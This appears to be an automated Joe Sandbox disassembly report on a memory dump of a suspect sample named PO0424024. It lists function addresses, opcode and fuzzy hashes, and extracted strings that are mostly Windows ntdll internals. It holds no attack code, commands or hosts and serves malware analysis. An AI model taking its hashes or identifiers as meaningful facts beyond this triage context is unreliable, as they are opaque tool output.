Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction ID: 1ff1fe56abeaceef8902b300d134b913ecf514cb204e36bd11889348a321b630
Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction Fuzzy Hash: 2531C1B2A00619AFDF119F95CC01EAEBBBDFB85750F004022F514A72A0D734DA05AB60

Uniqueness

Uniqueness Score: -1.00%

Function 00FE20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

LdrpInitializationFailure, xrefs: 00FE20FA
Process initialization failed with status 0x%08lx, xrefs: 00FE20F3
minkernel\ntdll\ldrinit.c, xrefs: 00FE2104

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 6c02abf5d7fae5f49f6ded7a7082a03e46c4d60d636cbda9b80a362e52221351
Instruction ID: ae64405c7b5cfb01e96c12124c86e52088b48f4015a4ae00aac26290b20d849e
Opcode Fuzzy Hash: 6c02abf5d7fae5f49f6ded7a7082a03e46c4d60d636cbda9b80a362e52221351
Instruction Fuzzy Hash: 1AF0C871A4034C7BE724E649CC43F9A3B6CFB41B54F500066FA406B282D6F8AA40EA51

Uniqueness

Uniqueness Score: -1.00%

Function 00F703E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00FC4D8A

Strings

#%u, xrefs: 00FC4D82

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 1b66f9dbef81844dedf044a324e4b93f03ddcf58421dc81b2e620beb606d3afd
Instruction ID: be7f95818d1767f57d73466218e6e7d0d244d5fccd6eaf0ffc1a5f3ca6a14b20
Opcode Fuzzy Hash: 1b66f9dbef81844dedf044a324e4b93f03ddcf58421dc81b2e620beb606d3afd
Instruction Fuzzy Hash: DA715C72A0014A9FDB01DF98C991FAEB7B8EF08714F144069E905E7251EB38EE41DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F752A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 00F755A3
@, xrefs: 00F75445

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: a36629d5c36d7252259d902894698290c0c8b30c001ff1730b7330e05478ca1a
Instruction ID: 249d8d8b36b598d504ed71cd4b10235fb91519d36cde85536b36253f3817d36d
Opcode Fuzzy Hash: a36629d5c36d7252259d902894698290c0c8b30c001ff1730b7330e05478ca1a
Instruction Fuzzy Hash: 29328C719087128BC724CF18C990B3AB7E1EF88B50F54892EF98997290E7B4DD45EB53

Uniqueness

Uniqueness Score: -1.00%

Function 0102A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 0102A551
`, xrefs: 0102A44B

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: b47132bcc6a5d88cea9777ad00ba3dbbb19dd740be35bc8242dd2f4c2947e4f0
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 49C1CD31304352DBEB24CE28C845B6BBBE5AFC8318F088A6DF6D68B691DB74D505CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00F604E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

kLsE, xrefs: 00F60540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00F6063D

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 9745cba96141829cbc66135b70eee7223e32ee8597ad2c1c2a988fcf2ce56c58
Instruction ID: 201ea46e5a9ed5e8bdff641a4efa698ca33a2229899ff193c8300fa60c54b2f3
Opcode Fuzzy Hash: 9745cba96141829cbc66135b70eee7223e32ee8597ad2c1c2a988fcf2ce56c58
Instruction Fuzzy Hash: 9A51F271A047468FC724EF24C4406A7B7E4AF84324F24483EE9DA87281EB75E945DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F6A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 00F6A309
RtlpResUltimateFallbackInfo Enter, xrefs: 00F6A2FB

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 5151f0dd3d9db9d37c92737c2f5b58c51b74291f544a962b40cf0d7a573f61af
Instruction ID: 6fdc02f3a0c97fa4b33c8e95d80257f43b4e9cd63556d359af932273f3616e0f
Opcode Fuzzy Hash: 5151f0dd3d9db9d37c92737c2f5b58c51b74291f544a962b40cf0d7a573f61af
Instruction Fuzzy Hash: 0941AD31A04649DBDB21CF59C942B6A77B4FF85720F2440A9E904EB391E376DE40EB52

Uniqueness

Uniqueness Score: -1.00%

Function 00FF35BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Exit, xrefs: 00FF35FE
LdrResGetRCConfig Enter, xrefs: 00FF35EC

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: 71687e43f41fe4349e65dd0db006788a4a486b38462c4473a4213fa85bc6b629
Instruction ID: 4206b7a3c8db4e31a38cc9abf139b5fe5f1ac6e2f2dd534211e594357f526330
Opcode Fuzzy Hash: 71687e43f41fe4349e65dd0db006788a4a486b38462c4473a4213fa85bc6b629
Instruction Fuzzy Hash: 0031E531609789ABD311DF28D844F2AB7E4EF85724F040869F954CB3A1EB74DA05EB53

Uniqueness

Uniqueness Score: -1.00%

Function 00F9329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 00F9330D
.Local\, xrefs: 00F932B5

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: eae9db9552cbde51402adc8f4659f0d9b6e6293c60ef216db93dd1608858ec40
Instruction ID: 6f102e6b9d91f06fdf4e7346a70309c7b4521d6a5b4d5cc332a73f979cd2ffc9
Opcode Fuzzy Hash: eae9db9552cbde51402adc8f4659f0d9b6e6293c60ef216db93dd1608858ec40
Instruction Fuzzy Hash: 2531B2B2548304AFE711DF28C881E5BBBE8FB85754F40092EF59983250DA35DE04AB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F934B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

RtlpInitializeAssemblyStorageMap, xrefs: 00FD2A90
SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 00FD2A95

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
API String ID: 0-2653619699
Opcode ID: aa545371009a27df4c63d4b131d38ca7b343cab17edb3d15d28a8fcf904b7d6b
Instruction ID: 204449620582fc70a28d6731bec7598c28a13ebbaa428a988944b88c2d8d2b4c
Opcode Fuzzy Hash: aa545371009a27df4c63d4b131d38ca7b343cab17edb3d15d28a8fcf904b7d6b
Instruction Fuzzy Hash: CF110072B04214BBFB35DA4DCD41F6B76A9DB94B54F19802A7904DF380D678DE00B6D0

Uniqueness

Uniqueness Score: -1.00%

Function 00F9A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 00F9A5E4
Threadpool!, xrefs: 00F9A5E9

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 486f2be800b12e56f1eaa2af42ddc5c8a8c17186a124cb1fc607ef465cf616f4
Instruction ID: 9950356a3cdeeed2b6fa828d2aa03efe44412a48e661dbab978be608d9aecaca
Opcode Fuzzy Hash: 486f2be800b12e56f1eaa2af42ddc5c8a8c17186a124cb1fc607ef465cf616f4
Instruction Fuzzy Hash: 4801D1B2240704AFE711DF14CD46B1677E8E784B26F058939B548C7190E738D804EB96

Uniqueness

Uniqueness Score: -1.00%

Function 00F67370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 729ba41ebb9cb7a88917f11fa1fe1cc210da0ff75f1df4240c9bc43f9eeb6985
Instruction ID: e65a44d0a10ec8c952372843325b107f046fd82af2536566baf81aaf45bdb884
Opcode Fuzzy Hash: 729ba41ebb9cb7a88917f11fa1fe1cc210da0ff75f1df4240c9bc43f9eeb6985
Instruction Fuzzy Hash: A3A17E71A08742CFC320DF28C580A2ABBE5BF98714F244A6DF58587351EB35ED45DB92

Uniqueness

Uniqueness Score: -1.00%

Function 0102132D Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

'y, xrefs: 010213ED

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: 'y
API String ID: 0-388886369
Opcode ID: 1aaa2242093da2fa5fa0caffa8838b57c2fae26d14f9308306ca370ce5c81e88
Instruction ID: 84f243b00b86c3fa51a53a25cc5f789636708a58226f156f72f7dd4a7016315d
Opcode Fuzzy Hash: 1aaa2242093da2fa5fa0caffa8838b57c2fae26d14f9308306ca370ce5c81e88
Instruction Fuzzy Hash: 52817075A00255DFCB09CF68C490AAEBBF1FF48310F1581A9E859EB355D734EA51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0101B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 0101B28F

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: PreferredUILanguages
API String ID: 0-1884656846
Opcode ID: bf78e0b18e40e097cfd713a7e1409a7710b0d1cd8ffb49f8a93be1986ea295bc
Instruction ID: f28dd3ab453cae0991e68945e851b2c10dee8f8847b13e5477aa0fb2c6738ca3
Opcode Fuzzy Hash: bf78e0b18e40e097cfd713a7e1409a7710b0d1cd8ffb49f8a93be1986ea295bc
Instruction Fuzzy Hash: BC41C572D00219ABDF21EA98CC40BEEB7B9EF44754F058166FE51A7258D778DE40C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0100705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

kLsE, xrefs: 010070A4

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: kLsE
API String ID: 0-3058123920
Opcode ID: f6a313296315cba0117537f812b91bcdcfb68c318a60a916e7eb154c504a37c0
Instruction ID: 38f5546ade1f882937fb4c9807b82b303b93f3f2053d62286c4271bfb2edb438
Opcode Fuzzy Hash: f6a313296315cba0117537f812b91bcdcfb68c318a60a916e7eb154c504a37c0
Instruction Fuzzy Hash: 2F41237150135186F772EB68E889BEB3BE4AB00724F540669FDD08A1CACB7F54C5C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00F97505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 00FD4622

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction ID: f5c187f3c77ae8092710d82b5a759a9e9117f0fa58d39c7a76b3529a83b0dfa1
Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction Fuzzy Hash: 69410F76A04716ABDF60EF48C880BBEB3B5EF44711F19405AE802A7200DB34ED41EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F65096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 00F650BF

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 98e251ea1187027ed422d9966f4aba28fb7cf10b6c266ccbf389c47819ab5466
Instruction ID: 584b31c9792ac5234ba81d2168d569b94b97c6a42a56453bd2d984bc3c102aeb
Opcode Fuzzy Hash: 98e251ea1187027ed422d9966f4aba28fb7cf10b6c266ccbf389c47819ab5466
Instruction Fuzzy Hash: 2211B931B04D13ABDB244E1D88507367295EB96B34F34863AD491EB351DA71DC41B380

Uniqueness

Uniqueness Score: -1.00%

Function 00FE106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

LdrCreateEnclave, xrefs: 00FE10F7

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID: LdrCreateEnclave
API String ID: 0-3262589265
Opcode ID: aff6b02ea59602ad1d7ad20c559631d103e83eeef13ad79613408b01228ce289
Instruction ID: dba774d1d856700db00352837224afeb1d41a70b3a2df67bcb442fdd6c2b9c98
Opcode Fuzzy Hash: aff6b02ea59602ad1d7ad20c559631d103e83eeef13ad79613408b01228ce289
Instruction Fuzzy Hash: A82134B19083849FC320DF1AC805A5FFBE8FBD5B50F404A1EFA9097251D7B59944DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00FB739A Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e712deff43edc44d31fbe546d3a4e669cc36bd680afd9a09a0c636987d17d14
Instruction ID: 12b9939f79dd05939f536556990a68a25d6cc3aa64284c0c46d99d490ffd9882
Opcode Fuzzy Hash: 4e712deff43edc44d31fbe546d3a4e669cc36bd680afd9a09a0c636987d17d14
Instruction Fuzzy Hash: E2428D71E046168FDB14EF5AC8806EEB7B6FF88324B288159D456AB350DB34ED41DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00F8B2C0 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8526019c6a12b9f6401e961df1f5da5b14fbaf6ab9bc559a0070a702074fbea0
Instruction ID: 95f19d2f0e163f56fb408d07981a46bb9bac6f71149c128fceb075bdcad71888
Opcode Fuzzy Hash: 8526019c6a12b9f6401e961df1f5da5b14fbaf6ab9bc559a0070a702074fbea0
Instruction Fuzzy Hash: 08329FB2E00219DBCF24DFA8C991BEEBBB5FF54714F180169E805AB391E7359901DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0100A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cc87b39cf58958f38fe585905c720b870335f72a249c673d6c77afb3dc84fcd
Instruction ID: 9b330855a373e4d4ebe89e5431dac504f6be23c6e69a10a5560c680dba334279
Opcode Fuzzy Hash: 9cc87b39cf58958f38fe585905c720b870335f72a249c673d6c77afb3dc84fcd
Instruction Fuzzy Hash: B2229974704761CAFB668F29C490376BBF1BF48340F08859AE9C68B2C6D735E582CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F665D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beacecd827c5541d5b3b7c10a198986cdde7ab0e549ba22340cf2d981e0944ba
Instruction ID: fd624f327b9564fdc27472681bd1abf9f303f8c7f4d04f36e2725b130f16329e
Opcode Fuzzy Hash: beacecd827c5541d5b3b7c10a198986cdde7ab0e549ba22340cf2d981e0944ba
Instruction Fuzzy Hash: B6E17B71908342CFC714CF28C590A6ABBE0FF99318F158A6DE999CB351DB31E905DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F58397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4005afbf150fc028e5d906e793850a912025bb8de9eaddd650c5c4fee2064e6
Instruction ID: 3c84bab44b422a3b3391358e3e816bc7ef2afaaa4981fcdce21a0184b658bab8
Opcode Fuzzy Hash: c4005afbf150fc028e5d906e793850a912025bb8de9eaddd650c5c4fee2064e6
Instruction Fuzzy Hash: 52D10172A00206DBCB14DF25CC81BBA77A1BF54355F144229FE12EB281EB74ED4AEB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F7F460 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a8a6def08b876953eb8663fbd6c8da5fe55b643ad6cb98fc2b75b7ef17b3ba6
Instruction ID: 70e53f12170c6a2907d19fec263fdd0cee2d0f78c66412036c0160337ff16f05
Opcode Fuzzy Hash: 4a8a6def08b876953eb8663fbd6c8da5fe55b643ad6cb98fc2b75b7ef17b3ba6
Instruction Fuzzy Hash: B9C13672E04211CBCB24CF19C890BB977B1FF44720F19817AE94A9B395E7358D45EB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F70535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: 9d77aa791f8dc954ed76b00efc32527a61bfabf730c11fb74af0bece8ae87576
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 4AB15532A00646EFDB25CB68C951FBEB7F6AF84310F14416AE146D7281DB34ED41EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F890DB Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b864c2bf84cd31429fa4515a05c2d1825593e2fa05e13f5fb6edda493a75ba5
Instruction ID: 33b5516667cd345b4e711665ba52b5e0e394f727e00cdd0969f5b22791fcbb80
Opcode Fuzzy Hash: 2b864c2bf84cd31429fa4515a05c2d1825593e2fa05e13f5fb6edda493a75ba5
Instruction Fuzzy Hash: 8EA14071900616BFEB22EF64CC42FBE77B9AF49760F054064F900AB290D7799D10EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F683C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b020de3ddf3ef1efa1035b5f000eedece36a126d3c2754eb5995cefd1cd01645
Instruction ID: 73e401574ed3fdb4ec39cebd096572104c2bfac8aab88fc19f17953f0f101be4
Opcode Fuzzy Hash: b020de3ddf3ef1efa1035b5f000eedece36a126d3c2754eb5995cefd1cd01645
Instruction Fuzzy Hash: E6C177706083418FD764CF18C485BABB7E4BF88354F44492DE98A87291EB74E909DF92

Uniqueness

Uniqueness Score: -1.00%

Function 00F5C427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7965029e7a0c3ca1bdf49426ca50a329272671ab31e3fc643b131dfc534ec1e8
Instruction ID: 962d5c888c8bedfe8e2dbf61bec00ed58faba278b926cd059d30b06ecdd31435
Opcode Fuzzy Hash: 7965029e7a0c3ca1bdf49426ca50a329272671ab31e3fc643b131dfc534ec1e8
Instruction Fuzzy Hash: 89B18270A002658FDB34DF55C880BA9B3F1EF44710F1485E9D90AE7281EB74AE85DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00F8E5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9657e6c8020a6ce3e95d45182aa94bd8041f90c88026cdd189b4201993223bf9
Instruction ID: dc2ff1ae8560e50335f620277727050bb750224f3dda4bd892c7432370fd24d4
Opcode Fuzzy Hash: 9657e6c8020a6ce3e95d45182aa94bd8041f90c88026cdd189b4201993223bf9
Instruction Fuzzy Hash: F8A15532E0025AAFDB21EB58CD45FEEFBB5AF00720F150129E911AB2D1D7789D44EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FA0185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92661a1eeb242491b8c5263986ac8dba935301fb8c78d0de12aac0a2e6dde459
Instruction ID: fa3ab693e7dd9649464f2099380b70cdfb3143858d5865b31fe987280525d540
Opcode Fuzzy Hash: 92661a1eeb242491b8c5263986ac8dba935301fb8c78d0de12aac0a2e6dde459
Instruction Fuzzy Hash: 61A103B1F007169FDB24DF65D890BAAB3B1FF59324F14402AEA0597381EB78E811EB50

Uniqueness

Uniqueness Score: -1.00%

Function 01034500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0384e05468157d2417c46439c8e4eb928164316507f640d2979d11b28253e86a
Instruction ID: 061fd6b2b841dc305300d1a28f26f0217481bebca367c6d304e6fc4be6cb61eb
Opcode Fuzzy Hash: 0384e05468157d2417c46439c8e4eb928164316507f640d2979d11b28253e86a
Instruction Fuzzy Hash: F9A1DD72A00601AFC712DF28CD81B5ABBE9FF88704F454669F589DB652D739E900CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F7E3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b95f8ef4626a9b5be31bfd8df7eb9e2498b014228fa150551014daa695ce0161
Instruction ID: 40b63903b7ba7f9f3ca683eea7b75abcb3782b41f6d36aad2664a6375694b30b
Opcode Fuzzy Hash: b95f8ef4626a9b5be31bfd8df7eb9e2498b014228fa150551014daa695ce0161
Instruction Fuzzy Hash: 13914536E006168BDB24DF58C945F7E77A1EF88724F19C0ABE809DB281E678DD01E752

Uniqueness

Uniqueness Score: -1.00%

Function 00F61131 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2172803570.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f30000_PO0424024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98e6b632f57f3cb74ba686ddff4a0d671ca458ce9bd57f94c99c98fdc4e20e4c
